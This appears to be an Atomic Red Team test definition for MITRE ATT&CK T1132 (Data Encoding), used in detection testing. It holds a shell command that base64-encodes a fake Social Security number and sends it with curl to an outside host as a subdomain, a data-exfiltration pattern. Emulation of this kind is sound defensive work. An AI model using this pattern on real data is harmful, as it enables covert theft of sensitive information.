atomic-red-team/atomics/T1132/T1132.yaml

---
attack_technique: T1132
display_name: Data Encoding

atomic_tests:
- name: Base64 Encoded data.
  description: |
    Utilizing a common technique for posting base64 encoded data.

  supported_platforms:
    - macos
    - linux

  input_arguments:
    destination_url:
      description: Destination URL to post encoded data.
      type: string
      default: redcanary.com
    base64_data:
      description: Encoded data to post using fake Social Security number 111-11-1111.
      type: string
      default: MTExLTExLTExMTE=

  executor:
    name: sh
    command: |
      echo -n 111-11-1111 | base64
      curl -XPOST #{base64_data}.#{destination_url}